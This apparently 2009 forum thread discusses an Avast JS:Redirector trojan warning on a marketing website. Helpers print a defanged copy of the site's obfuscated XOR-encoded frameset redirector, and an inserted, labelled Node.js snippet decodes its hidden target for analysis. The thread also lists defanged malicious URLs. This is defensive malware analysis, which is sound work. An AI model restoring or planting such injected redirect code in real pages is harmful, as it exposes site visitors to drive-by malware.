JS:Redirector-V [Trj]

I was referred to a site named WWW.autopilotprofits.com by a service I subscribe to, which I would normally trust. However, when I try to access the service, AVAST issues me a warning that the file I’m trying to access is infected with JS:Redirector-V [Trj], and I chose to abort the connection. I contacted the service that referred me to this site and they assured me that they regularly use the site without problem. Before I tell AVAST to accept this site as a false positive, I’d like to have some assurance my computer will not become infected. I have googled for JS:Redirector-V [Trj], but could not find a direct match. There are others, e.g., JS:Redirector-B [Trj], JS:Redirector-G [Trj], etc., but I don’t know if they are related. Most of all, I need to know what this trojan horse does. Does anyone know anything about it?

Well, using Firefox 3.0.11 I don’t get an avast alert on that page (no alert in the Avant browser either), so can you be more detailed about the file you are trying to access and what avast alerted on?

Check the avast! Log Viewer (right click the avast ‘a’ icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe

  • Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log

When posting URLs to suspect sites, change the http to hXXp so the link isn’t active (clickable) avoiding accidental exposure.

Hi cpfeiffer and DavidR,

Well, the site has been redirecting to malcode.
Here is the Google security report: Of 35 pages that have been tested during the last 90 days, 1 page without the user’s consent downloaded and installed malicious software. The last time this was found was on 2009-06-27. The last time the site had suspicious content was on 2009-06-24.
Malicious software was hosted on 1 domain, e.g. mixmaxgroup.cn/; malicious software there includes 2 trojans, 1 scripting exploit.

This site was hosted on 1 network(s) including AS19181 (CWIE).

Here is a list of the files I have tried to access:
hxxp://www.autopilotprofits.com/contentrewrite.htm
hxxp://www.autopilotprofits.com/cheapdomains.htm
hxxp://www.autopilotprofits.com/sya.htm
hxxp://www.autopilotprofits.com/keyword.htm
hxxp://www.autopilotprofits.com/bg.htm
hxxp://www.autopilotprofits.com/goodhosting.htm
hxxp://www.autopilotprofits.com/wt.htm

I get the same warning from AVAST on each one. Would it be advisable to download these files and then ask AVAST or another service to clean them afterwards, or is there a way to clean them before downloading them?

Hi cpfeiffer,

On the first link I get this: (Level: 1) Url checked: (frame source)
hxxp://www.autopilotprofits.com/+yt+
Blank page / could not connect
No ad codes identified

And immediately it is BINGO: this is the (EDITED BY ME for security reasons) suspicious code in question:

 ^!--
window.status = ' ';.........
sdf = "iuuq$2@..vvv/rsurngu/bnl.bfh,cho.mxsd/bfh.kwl.q`bj`fd.fn^inldq`fd/iulm$2Gq`bj^he$2E4020$37`gg^he$2E0050";yt="";v*r length=sdf.length;for(i=0;i<length;i++){yt+=String.fromCh*rCode(sdf.ch*rCodeAt(i)^1);}yt=unesc*pe(yt);
document.writeln("<FR*MESET BORDER=\"0\" FR*MEBORDER=\"0\" FR*MESPACING=\"0\" R0WS=\"100%,0\\*\"^");
document.writeln("<frame fr*meBorder=\"0\" fr*meSpacing=\"0\" m*rginHeight=\"0\" marginWidth=\"0\" scrolling=\"yes\" n*me=\"m*ster\" noresize src=\""+yt+"\"^");
document.writeln(^\/FR*MESET^");
//--^

You may have noticed that when you take down all your webpages from your server and put up backupfiles there, this nasty trojan will have reinfected your pages within the next 6 hours.

How to solve this?
Easy peasy: change the FTP server password. When you have done this, take all infected pages from the server and then swap in the backup. Upload all, and away is your trojan; your visitors can again safely visit your site! Avast is one of the few AV vendors to detect this trojan.

polonus
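The decoder loop in the snippet above can be reproduced outside a browser so that the frame target is read rather than loaded. This is an added example, not code from the thread or from the site: it takes the defanged copy polonus posted (the `*` for `a` and `^` for `<`/`>` substitutions are his), pulls the `sdf` string and the XOR key out with regular expressions, and applies the same `charCode ^ key` followed by `unescape` steps in Node.js. The encoded string is the one on the page; the function names and the regexes are mine.

```javascript
// Added example (not code from the thread): recover the frame target of the
// redirector polonus posted without executing it. Only the `sdf` string and
// the XOR key are read from the snippet; nothing is fetched or written to a page.

// polonus's defanged copy, assembled from his post: he replaced 'a' with '*'
// and '<' / '>' with '^' so the code cannot run as pasted. The encoded string
// itself is unmodified, which is all the decoder needs.
const DEFANGED_SNIPPET = [
  "window.status = ' ';",
  'sdf = "iuuq$2@..vvv/rsurngu/bnl.bfh,cho.mxsd/bfh.kwl.q`bj`fd.fn^inldq`fd/iulm$2Gq`bj^he$2E4020$37`gg^he$2E0050";yt="";v*r length=sdf.length;for(i=0;i<length;i++){yt+=String.fromCh*rCode(sdf.ch*rCodeAt(i)^1);}yt=unesc*pe(yt);',
].join('\n');

// Pull the quoted payload out of `sdf = "..."`. Returns null if absent.
function extractEncodedString(snippet) {
  const m = /\bsdf\s*=\s*"([^"]*)"/.exec(snippet);
  return m ? m[1] : null;
}

// Pull the XOR key out of `...rCodeAt(i)^1)`; tolerant of the '*' defanging
// because only the tail of the identifier is matched. Null if not present.
function extractXorKey(snippet) {
  const m = /rCodeAt\(i\)\^(\d+)\)/.exec(snippet);
  return m ? Number(m[1]) : null;
}

// The script's decode loop: XOR every UTF-16 code unit with the key, then
// apply the same legacy unescape() the script calls (%3A -> ':' and so on).
function xorDecode(encoded, key) {
  let out = '';
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(encoded.charCodeAt(i) ^ key);
  }
  return unescape(out);
}

// End to end: snippet text in, decoded frame `src` out. Throws rather than
// guessing if the snippet does not carry the sdf/XOR pattern.
function decodeRedirect(snippet) {
  const encoded = extractEncodedString(snippet);
  const key = extractXorKey(snippet);
  if (encoded === null || key === null) {
    throw new Error('snippet does not contain the expected sdf/XOR decoder');
  }
  return xorDecode(encoded, key);
}

// Sanity check on the result: a frame target should be a plain http(s) URL.
function looksLikeUrl(s) {
  return /^https?:\/\/[^\s"']+$/.test(s);
}

console.log('frameset src would load:', decodeRedirect(DEFANGED_SNIPPET));
```

Run it with `node` on a saved copy of the script; the printed value is the `src` the frameset would have loaded, which you can then compare against the hosts in the Google report and the whois data before deciding whether a page is clean. Because the payload is only XORed with a one-byte key, the same function works for the sibling Redirector variants that differ only in the constant after `^`.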

That’s all gibberish to me (pardon my ignorance). I just need to know what to do about it, i.e., are these tools usable, or do they have to be “cleaned” before downloading to my computer? And if so, how do I go about doing that?

Hi cpfeiffer,

Well you are not infected if you got the warnings from avast upon visiting the site and the connection for the malicious download was aborted. Do not download unless you want a trojan. So you are secure. Do not visit that site until it has been cleansed by the webmaster there or the site admins or the hosting firm that owns the site. You could mail them and send the webmaster the link of this thread. I think he will know what to do “from my gibberish” so the visitors of his website are again made secure by taking down the malcode from the web-page.

polonus

I haven’t the slightest idea how you found those links on the hXXp://www.autopilotprofits.com/ home page, I can find no links to any of the pages you listed. Only ones to clickbank for payment.

The code that polonus posted uses redirection, and this is what avast is alerting on, I believe. However, I believe that code is related to frames, so that a child page doesn’t open outside of the parent (frame); I know, more gibberish for you, but everything is wrapped within a frame.

The whois details I get for the site IP address shown in Firefox don’t match the domain name (image1), http://whois.domaintools.com/204.14.3.168, yet the IP address appears under Myriad Networks (image2), so it looks a little strange.

So if you try to access the pages you listed in isolation, there appears to be a frame redirect (window.status), and this is all that is on any of those pages: no page content, just a frameset redirect.